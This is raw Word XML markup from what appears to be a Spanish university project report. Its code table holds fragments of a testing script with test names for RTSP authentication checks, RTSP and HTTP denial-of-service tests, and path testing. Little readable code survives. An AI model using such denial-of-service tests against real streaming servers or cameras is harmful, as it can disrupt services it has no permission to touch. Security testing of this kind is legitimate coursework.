                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Testing "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ip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w:t>
            </w:r>
            <w:r w:rsidR="00881E2C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">" </w:t>
            </w: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TEST_RTSP_AUTH_DESCRIBE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rtsp_auth_describe</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TEST_RTSP_AUTH_SETUP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rtsp_auth_setup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TEST_RTSP_AUTH_PLAY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rtsp_auth_play</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TEST_RTSP_AUTH_TEARDOWN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rtsp_auth_teardown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rtsp_dos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TEST_RTSP_DOS_2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rtsp_dos_setup</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TEST_HTTP_DOS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http_dos</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r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> TEST_HTTP_PATH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http_path</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ip</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</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014FC6" w:rsidRDefault="00014FC6" w:rsidP="00014FC6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00014FC6" w:rsidRPr="00881E2C" w:rsidRDefault="00014FC6" w:rsidP="00014FC6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    write_log</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"Test finished"  </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"\r\n"</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005647FD" w:rsidRPr="00014FC6" w:rsidRDefault="005647FD" w:rsidP="001602EB">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="2" w:after="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005647FD" w:rsidRDefault="005647FD" w:rsidP="005647FD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0076034E" w:rsidRPr="00105CA1" w:rsidRDefault="0076034E" w:rsidP="00105CA1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0076034E" w:rsidRPr="00105CA1" w:rsidSect="0076034E">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8351F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3666313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13350F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7BD06DB2"/>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33B03731"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20C0DF3A"/>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405F32A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5468ABA"/>
    <w:lvl w:ilvl="0" w:tplc="02B640A8">
      <w:start w:val="2"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:r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4">
    <w:nsid w:val="41EB190C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A35222A2"/>
    <w:lvl w:ilvl="0" w:tplc="03D8F042">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5">
    <w:nsid w:val="631D1615"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE506672"/>
    <w:lvl w:ilvl="0" w:tplc="040A0011">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FB604EB4">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3F91F13"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B00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5C03F79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="433A7AE6"/>
    <w:lvl w:ilvl="0" w:tplc="35CE71A4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Cambr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FAD575A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE46AB90"/>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8"/>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034E"/>
    <w:rsid w:val="00014FC6"/>
    <w:rsid w:val="000335AC"/>
    <w:rsid w:val="000B76C4"/>
    <w:rsid w:val="00105CA1"/>
    <w:rsid w:val="001071D8"/>
    <w:rsid w:val="001602EB"/>
    <w:rsid w:val="00173DC6"/>
    <w:rsid w:val="00187051"/>
    <w:rsid w:val="00232CD0"/>
    <w:rsid w:val="002C54C6"/>
    <w:rsid w:val="002D08CE"/>
    <w:rsid w:val="0036326A"/>
    <w:rsid w:val="00413D0B"/>
    <w:rsid w:val="0044601B"/>
    <w:rsid w:val="004C46BC"/>
    <w:rsid w:val="00516BFA"/>
    <w:rsid w:val="005647FD"/>
    <w:rsid w:val="005C7203"/>
    <w:rsid w:val="00622752"/>
    <w:rsid w:val="006B1D2D"/>
    <w:rsid w:val="0076034E"/>
    <w:rsid w:val="00775239"/>
    <w:rsid w:val="007D31A4"/>
    <w:rsid w:val="007E31D4"/>
    <w:rsid w:val="007E769B"/>
    <w:rsid w:val="008131C6"/>
    <w:rsid w:val="00881E2C"/>
    <w:rsid w:val="008E72E7"/>
    <w:rsid w:val="009A4EEE"/>
    <w:rsid w:val="009D77CB"/>
    <w:rsid w:val="009E653D"/>
    <w:rsid w:val="009F54DA"/>
    <w:rsid w:val="00A1136B"/>
    <w:rsid w:val="00AF0B14"/>
    <w:rsid w:val="00B76284"/>
    <w:rsid w:val="00BD13DB"/>
    <w:rsid w:val="00BF7A06"/>
    <w:rsid w:val="00C73A23"/>
    <w:rsid w:val="00C81553"/>
    <w:rsid w:val="00C84B17"/>
    <w:rsid w:val="00C9521D"/>
    <w:rsid w:val="00D5716F"/>
    <w:rsid w:val="00E85144"/>
    <w:rsid w:val="00F66210"/>
    <w:rsid w:val="00F92F4F"/>
    <w:rsid w:val="00F9611E"/>
    <w:rsid w:val="00FA3BD7"/>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551354"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo4Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C84B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rsid w:val="00C81553"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo4Car">
    <w:name w:val="Título 4 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00C84B17"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="0044601B"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="008131C6"/>
    <w:pPr>
      <w:spacing w:beforeLines="1" w:afterLines="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="es-ES_tradnl"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Sombreadomediano1-nfasis2">
    <w:name w:val="Medium Shading 1 Accent 2"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="63"/>
    <w:rsid w:val="00F9611E"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="es-ES_tradnl"/>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7901702">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="228803971">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="287901518">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="977341265">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1961493395">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2048867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ofesores.elo.utfsm.cl/~agv/elo323/2s10/projects/ApablazaBustamante/desc.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4439</Words>
  <Characters>25305</Characters>
  <Application>Microsoft Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>210</Lines>
  <Paragraphs>50</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>31076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Repiso Sánchez</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Javier Repiso Sánchez</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-06-12T15:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-06-12T15:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>